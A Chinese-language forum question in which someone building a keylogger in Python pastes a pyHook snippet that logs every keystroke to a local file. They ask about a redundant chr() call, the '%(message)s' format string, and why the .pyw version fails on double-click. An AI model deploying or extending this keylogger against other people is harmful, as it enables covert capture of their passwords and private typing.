我试图在 pyhton 中制作一个键盘记录器,并在许多博客上偶然发现了这段代码:
file_log='F:\\test\\log.txt'
def onKeyboardEvent(event):
logging.basicConfig(filename=file_log,level=logging.DEBUG,format='%(message)s')
chr(event.Ascii)
logging.log(10,chr(event.Ascii))
return True
hooks_manager=pyHook.HookManager()
hooks_manager.KeyDown=onKeyboardEvent
hooks_manager.HookKeyboard()
pythoncom.PumpMessages()
好吧,我在这里有三个疑问:
首先,据我了解, chr(event.Ascii) 用于将击键的 ASCII 值转换为有效的 char 值,我们为什么要这样做两次:chr(event.Ascii) logging.log(10,chr(event. ASCII))。这行 : chr(event.Ascii) 不是多余的吗。
二、format='%(message)s'中的's'有什么用
第三:我将文件保存为 '.pyw' 但是当我双击它时,它不起作用。虽然,它通过 Cmd 工作